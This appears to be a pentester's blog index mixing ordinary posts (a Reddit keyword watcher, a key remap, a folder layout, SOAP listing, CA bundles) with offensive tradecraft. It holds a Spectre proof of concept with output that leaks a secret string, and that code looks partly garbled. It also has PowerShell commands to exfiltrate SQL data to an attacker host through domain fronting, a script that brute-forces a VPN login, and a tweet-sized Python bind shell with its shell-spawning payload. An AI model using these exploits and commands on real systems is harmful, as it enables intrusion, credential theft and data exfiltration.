Tuesday, February 20, 2018

Reddit Watcher - Watch All Reddit Posts For Special Keyword

I was playing around last night with the Reddit API and found that it allows for streaming content to /r/all. This effectively means that every (public) submission can be parsed and played with. I decided to write a small script to check if a certain keyword is in the title of the submission.

You can do extend this in a bunch of other ways:
  • Instead of printing to screen, send to twilio or OSX popups
  • Extend the keyword checking to the content or their comments
  • Restrict the catchall subreddit /r/all to something more specific like /r/netsec
  • Pump the submission through sentiment analysis and graph over time to figure out if people hate you
Below is the code for the script:
#!/usr/bin/env python3

import praw
keyword = " i "
client_id = 'x-CLIENTIDHERE'
client_secret = 'ioID-CLIENTSECRETHERE'
user_agent = 'OSX:myscripthere:v1.0 (by /u/myuserhere)'
reddit = praw.Reddit(client_id=client_id,

for submission in reddit.subreddit('all').stream.submissions():
    if keyword in submission.title.lower():
        print('https://reddit.com/%s : /r/%s - %s ' % (submission.id, submission.subreddit, submission.title))

Once you run that with your specific OAUTH details, you'll get streaming submissions outputted to your screen:

Currently the script is only triggering if the word " I " is in the post (for testing), obviously change to your specific keyword.

Friday, January 19, 2018

Remap Right Shift To Up Arrow OSX

The up arrow on the new 2017 Macbook pros are stupid small and very difficult to accurately hit. This can be extremely annoying when in a terminal and you need to hit "up" several times to go through your history.

Unfortunately there is no builtin way to modify the right shift key and map it to arbitrary keys. Fortunately, however, there is an app call "Karabiner" that grants you this functionality at an OS level. Meaning, it's not application specific.

The process is incredibly simple:

  1. Download Karabiner
  2. Go to the "Simple Modifications" tab
  3. Click "Add Item"
  4. From Key: right_shift, To Key: up_arrow as seen below:


Thursday, January 4, 2018

Spectre on Apple MacBook Pro Retina

I have a test machine running 10.13.2 on a MacBook Pro Retina 2017 running an Intel Core i7. The below PoC C code works when compiled with the following command:

gcc -march=native -std=c11 -o spectre spectre.c; ./spectre

Save the below PoC code as "spectre.c"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#include <x86intrin.h> /* for rdtscp and clflush */

Victim code.
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];

Analysis code
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */


    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      time1 = __rdtscp( & junk); /* READ TIMER */
      junk = * addr; /* MEMORY ACCESS TO TIME */
      time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
      if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];

int main(int argc,
  const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2];

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    printf("0x%02X=’%c’ score=%d ", value[0],
      (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
  return (0);

The original code came from the spectre paper but required a tiny patch from a gist page to work on macOS (google it and you can find it)

If you run it, this is what you should expect:

$ gcc -march=native -std=c11 -o spectre spectre.c; ./spectre
Reading 40 bytes:
Reading at malicious_x = 0xfffffffffffffebe... Unclear: 0x54=’T’ score=931 (second best: 0x00 score=912)
Reading at malicious_x = 0xfffffffffffffebf... Unclear: 0x68=’h’ score=974 (second best: 0x00 score=952)
Reading at malicious_x = 0xfffffffffffffec0... Unclear: 0x65=’e’ score=985 (second best: 0x01 score=842)
Reading at malicious_x = 0xfffffffffffffec1... Unclear: 0x20=’ ’ score=985 (second best: 0x00 score=957)
Reading at malicious_x = 0xfffffffffffffec2... Unclear: 0x4D=’M’ score=994 (second best: 0x00 score=982)
Reading at malicious_x = 0xfffffffffffffec3... Unclear: 0x61=’a’ score=992 (second best: 0x00 score=972)
Reading at malicious_x = 0xfffffffffffffec4... Unclear: 0x67=’g’ score=997 (second best: 0x00 score=977)
Reading at malicious_x = 0xfffffffffffffec5... Unclear: 0x69=’i’ score=994 (second best: 0x00 score=965)
Reading at malicious_x = 0xfffffffffffffec6... Unclear: 0x63=’c’ score=989 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffec7... Unclear: 0x20=’ ’ score=978 (second best: 0x00 score=961)
Reading at malicious_x = 0xfffffffffffffec8... Unclear: 0x57=’W’ score=992 (second best: 0x00 score=973)
Reading at malicious_x = 0xfffffffffffffec9... Unclear: 0x6F=’o’ score=992 (second best: 0x00 score=974)
Reading at malicious_x = 0xfffffffffffffeca... Unclear: 0x72=’r’ score=999 (second best: 0x00 score=986)
Reading at malicious_x = 0xfffffffffffffecb... Unclear: 0x64=’d’ score=988 (second best: 0x00 score=970)
Reading at malicious_x = 0xfffffffffffffecc... Unclear: 0x73=’s’ score=995 (second best: 0x00 score=967)
Reading at malicious_x = 0xfffffffffffffecd... Unclear: 0x20=’ ’ score=990 (second best: 0x00 score=978)
Reading at malicious_x = 0xfffffffffffffece... Unclear: 0x61=’a’ score=985 (second best: 0x00 score=961)
Reading at malicious_x = 0xfffffffffffffecf... Unclear: 0x72=’r’ score=998 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffed0... Unclear: 0x65=’e’ score=987 (second best: 0x00 score=953)
Reading at malicious_x = 0xfffffffffffffed1... Unclear: 0x20=’ ’ score=986 (second best: 0x00 score=959)
Reading at malicious_x = 0xfffffffffffffed2... Unclear: 0x53=’S’ score=952 (second best: 0x00 score=925)
Reading at malicious_x = 0xfffffffffffffed3... Unclear: 0x71=’q’ score=991 (second best: 0x00 score=981)
Reading at malicious_x = 0xfffffffffffffed4... Unclear: 0x75=’u’ score=964 (second best: 0x00 score=948)
Reading at malicious_x = 0xfffffffffffffed5... Unclear: 0x65=’e’ score=987 (second best: 0x00 score=971)
Reading at malicious_x = 0xfffffffffffffed6... Unclear: 0x61=’a’ score=981 (second best: 0x00 score=936)
Reading at malicious_x = 0xfffffffffffffed7... Unclear: 0x6D=’m’ score=997 (second best: 0x00 score=987)
Reading at malicious_x = 0xfffffffffffffed8... Unclear: 0x69=’i’ score=997 (second best: 0x01 score=899)
Reading at malicious_x = 0xfffffffffffffed9... Unclear: 0x73=’s’ score=999 (second best: 0x00 score=971)
Reading at malicious_x = 0xfffffffffffffeda... Unclear: 0x68=’h’ score=997 (second best: 0x00 score=977)
Reading at malicious_x = 0xfffffffffffffedb... Unclear: 0x20=’ ’ score=992 (second best: 0x00 score=979)
Reading at malicious_x = 0xfffffffffffffedc... Unclear: 0x4F=’O’ score=980 (second best: 0x00 score=914)
Reading at malicious_x = 0xfffffffffffffedd... Unclear: 0x73=’s’ score=994 (second best: 0x00 score=941)
Reading at malicious_x = 0xfffffffffffffede... Unclear: 0x73=’s’ score=931 (second best: 0x00 score=901)
Reading at malicious_x = 0xfffffffffffffedf... Unclear: 0x69=’i’ score=999 (second best: 0x00 score=980)
Reading at malicious_x = 0xfffffffffffffee0... Unclear: 0x66=’f’ score=878 (second best: 0x00 score=847)
Reading at malicious_x = 0xfffffffffffffee1... Unclear: 0x72=’r’ score=997 (second best: 0x00 score=949)
Reading at malicious_x = 0xfffffffffffffee2... Unclear: 0x61=’a’ score=988 (second best: 0x00 score=962)
Reading at malicious_x = 0xfffffffffffffee3... Unclear: 0x67=’g’ score=997 (second best: 0x00 score=951)
Reading at malicious_x = 0xfffffffffffffee4... Unclear: 0x65=’e’ score=996 (second best: 0x00 score=985)
Reading at malicious_x = 0xfffffffffffffee5... Unclear: 0x2E=’.’ score=989 (second best: 0x00 score=973)

Wednesday, November 29, 2017

Exfiltrating SQL data from Windows

Let's say you get a winexe or wmiexec shell to a SQL server. Maybe you want to extract the top 10 rows of some juicy looking table. Maybe you need to exfil it to your HTTP server and are yolo'ing it. The following may help you:

Output the top 10 records of a SQL table using osql:
osql -E -Q "use DATABASEHERE; select top 10 * from ZOMGSEXYTABLE" -o C:\windows\temp\LOLDATA.txt

Post the file to a URL using powershell:
powershell -noprofile Invoke-RestMethod -Uri http://PUT.MY.IP.HERE -Method Post -InFile C:\windows\temp\LOLDATA.txt -ContentType "multipart/form-data"

Set up a an HTTP server to receive the file, or just ncat -l it.

Oh, want to use domain fronting? use this powershell line instead:
powershell -noprofile Invoke-RestMethod -Uri http://FRONTABLE.DOMAIN.HERE -Headers @{Host='MY.CLOUDFRONTDOMAINHERE'} -Method Post -InFile C:\windows\temp\LOLDATA.txt -ContentType "multipart/form-data"

Thursday, September 21, 2017

Using OpenCV for Redteams ("Rotate! Enhance!")

Often times when you are moving from office to office in the middle of the night trying to find credentials or sensitive data, your best option is to take a photo with your phone. It's handy, it's nearby, and it's often good enough.

Unfortunately, sometimes your nervousness and anxiety in the moment causes your hands to shake. Resulting in a blurry photo of potentially very important information.

For example, this photo:

You can make out some of the content here but the important part, the passwords and usernames isn't exactly legible.

Is this unusable? did you just mess up big time? did you just cost the success of your red team because of a shaky hand? maybe not.

OpenCV has an example python script called "deconvolution.py". All you need to do is supply the name of your file to the script and it will open two windows, one of the original, and one of the deconvoluted version:

$ python2.7 deconvolution.py --angle 180 --d 20 ~/IMG_4696.JPG.jpeg

On the deconvolution window, there are draggable scales at the bottom. Adjusting the angle, distance, and SNR allow you to clean up the photo somewhat. After about 5 minutes of playing with the controls, this was the best result I could get. It's good enough to get the username and most of the password:

You can tell that the first username is "Sally" and the password is "ZOMGSuperl33tPassw0rd!". The second username is "lolwut" and the second password doesnt come out that well in this static image.

HOWEVER, I found that quickly dragging the scales back and forth seem to trick your mind into blending edges together in a way in which you can figure out what the letters actually are. Do this enough and you can discover the password is "WhyDoesSallyHaveAccess?".

Thursday, June 29, 2017

An Efficient Setup For Scripts/Git

I'm obsessed by organization. I'm pretty sure I was OCD in another life. It carries over to this life in small ways.

As a pentester, I have to deal with many different custom scripts I write, my coworkers write, that I get off Github. Remembering where scripts/tools are when you may only ever touch something very rarely can become very annoying to manage. I've come up with a system that works very well for me. Perhaps it will work for you as well.


  • My overall projects folder that contains both git repos as well as temporary project ideas that may turn into something later. Contains many different directories that are project or task focused. 
  • For example, ~/projects/python-code/ is where I store my one-off Python code snippets to experiment and remind myself of concepts.
  • This is also where I store project directories that don't have corresponding git repos. Zips, tars, etc from directly downloaded servers.


  • If it has a repo, this is where it's cloned. Whether it's personal git repo or other's repo, any and all git repos go here. This makes it easier to remember what I got from where, and run a quick git pull.
  • This is also where I initialize any repo I plan on adding to my github account


  • These are almost all one-off scripts used for various tasks, or to glue some disparate tools together.
  • For example, it contains scripts that parse output from one tool and pass it to another. Nothing groundbreaking here, just saves time typing.
  • Most importantly, this directory is added to my path so every script/symlink can easily be accessed at the command line.
  • This is where I symlink all my git tools so I don't have to supply full paths to reach them


  • Yes, it's a temp folder off my home directory, I know how weird that sounds.
  • It's specifically for files I need very temporarily but I don't want to lose them if my machine crashes. It's mostly used for debugging/troublshooting scripts or testing shell functionality.
  • I go through it about once a month and remove anything I can't remember.
This setup has served me very well. I'd say the biggest paradigm shift for myself was to get in the habit of symlinking certain git tools and project scripts in the ~/scripts directory which is in my path; the integration of repo -> my machine is seamless.

     If someone writes a shitty script that breaks if you call it from another directory then I just write a quick one-line script to call it instead of a simple symlink. Still, fairly seamless.

Bonus Tip:
     I also can't stress enough the benefits of backing up everything to a drive and then wiping out your box and starting from scratch. Yes it's annoying to reinstall so many applications, but things run smoother with fewer errors because many superfluous packages/configs are gone. You won't lose any files since you can just browse them from your backup drive.

Tuesday, June 20, 2017

Attacking Complex Web Application Login Forms

Requests, Mechanize, and other HTTP clients or web scrapers are wonderful for automating a variety of tasks against web servers. Many times, if you want to brute force a login against some web app you can just use tools like those or Burp Intruder or whatever else strikes your fancy.

But sometimes, you run across a web app that does some ungodly Javascript hashing/mangling/demonic incantations to your input. When you see these situations, you need to have a tool parse, understand, and even execute the Javascript from your page.

I have found PhantomJS to be a fantastic tool to help with that. I use it as my "browser" for Selenium scripts and it works the same way, but this is all headless, no need for Firefox or Chrome windows to pop up and start clicking things. It all happens in the background transparently.

I recently came across a Checkpoint SSL VPN that I wanted to try a dictionary attack against. I wrote the following temporary script to accomplish it. It's not speedy, but then again that introduces a pseudo-sleep timer I was going to put in anyway.

I pasted the login combinations in the logins dict and ran it.

#!/usr/bin/env python3

from selenium import webdriver
from selenium.webdriver.common.keys import Keys

logins = {'user1':'pass1', 'user2':'pass2'}

for username, password in logins.items():
 driver = webdriver.PhantomJS()
 driver.set_window_size(1024, 768)
 usernamefield = driver.find_element_by_name('userName')
 passwordfield = driver.find_element_by_name('loginInput')
 errormsg = driver.find_element_by_id('ErrorMsg').text
 print(username + ':' + password + ' = ' + errormsg)

It turns out that phantomjs will return a completely empty page without any sort of error if it encounters an invalid SSL certificate. You can easily account for this by changing:
 driver = webdriver.PhantomJS()
driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'])

Listing SOAP Services In Python

If you found a WSDL, you could of course just read the XML and figure out what it's doing, or you can use the Python module zeep to do it for you:

$ python -mzeep http://www.dataaccess.com/webservicesserver/numberconversion.wso?WSDL

     ns0: http://www.dataaccess.com/webservicesserver/
     xsd: http://www.w3.org/2001/XMLSchema

Global elements:
     ns0:NumberToDollars(dNum: xsd:decimal)
     ns0:NumberToDollarsResponse(NumberToDollarsResult: xsd:string)
     ns0:NumberToWords(ubiNum: xsd:unsignedLong)
     ns0:NumberToWordsResponse(NumberToWordsResult: xsd:string)

Global types:

     Soap11Binding: {http://www.dataaccess.com/webservicesserver/}NumberConversionSoapBinding
     Soap12Binding: {http://www.dataaccess.com/webservicesserver/}NumberConversionSoapBinding12

Service: NumberConversion
     Port: NumberConversionSoap (Soap11Binding: {http://www.dataaccess.com/webservicesserver/}NumberConversionSoapBinding)
            NumberToDollars(dNum: xsd:decimal) -> NumberToDollarsResult: xsd:string
            NumberToWords(ubiNum: xsd:unsignedLong) -> NumberToWordsResult: xsd:string

     Port: NumberConversionSoap12 (Soap12Binding: {http://www.dataaccess.com/webservicesserver/}NumberConversionSoapBinding12)
            NumberToDollars(dNum: xsd:decimal) -> NumberToDollarsResult: xsd:string
            NumberToWords(ubiNum: xsd:unsignedLong) -> NumberToWordsResult: xsd:string

Zeep seems to be the best SOAP client for Python. It's written on top of python Requests, it's well documented, and works on both Python 2 & 3.

Friday, June 16, 2017

Smallest Python Bind Shell

    As a followup to my previous post about making the smallest python reverse bind shell, A coworker ran into a situation where outbound connections were not allowed. So I decided to change the code to be a bind shell instead of a reverse-connect shell.

    This version simply sits and listens on the specified port for input, and then executes whatever text it receives as python code. Just like with the reverse-bind shell, I'm sure this would more accurately be classified as a stager since the meat of the code is actually sent when you connect to the socket, as you'll see later.

If you're able to execute Python code on the target machine and have limited space for injections (SQL/limited command injection/whatever) this 105 character tweet-able bind shell may work for you:

import socket as a
s = a.socket()
(r,z) = s.accept()

Once this is executed on the victim machine, you then connect to it with netcat/ncat.

$ ncat localhost 2425 -v
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to

Then paste in the following line. Once it's pasted in, don't hit enter like you'd expect, hit CTRL-D so your terminal sends the EOF signal. Once you hit CTRL-D it will pop a shell for you to have fun with.

import pty,os;os.dup2(r.fileno(),0);os.dup2(r.fileno(),1);os.dup2(r.fileno(),2);pty.spawn("/bin/bash");s.close()

And boom, shell:

$ ncat localhost 2425 -v
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to
import pty,os;os.dup2(r.fileno(),0);os.dup2(r.fileno(),1);os.dup2(r.fileno(),2);pty.spawn("/bin/bash");s.close()

[09:41:21][victim]@[victimhost:~]$ pwd

PS. The bind shell code is saying to bind to port 2425, which is just to make it not require root privileges. If you don't have root, you won't be able to bind it to any port less than 1024.

PPS. As with the reverse shell, I simply haven't found anything smaller. I'm sure there is some Python wizardry to make it smaller, but this is good enough for most purposes.

     I was reminded that IPs can be shortened mathematically and it does in fact work with the socket library. I changed the above bind line to '127.1' since it is equivalent to and shorter than 'localhost'. This brings the overall size from 109 characters to 105. Granted that won't matter when yo put in your own server for an actual attack but whatever. IT STILL COUNTS.

Wednesday, June 14, 2017

SSL Cert Bundle (Root Certificate Authorities)

Certain tools/scripts require you to specify a Root CA bundle for them to compare SSL certificates against. Below are a couple paths containing downloadable files containing root certificate information:

Curl's Bundle (based off Mozilla, easy to integrate):

Mozilla's Cert text file:

Chrome uses the underlying certificate store that is already on the machine


This github project tracks certificates from different vendors: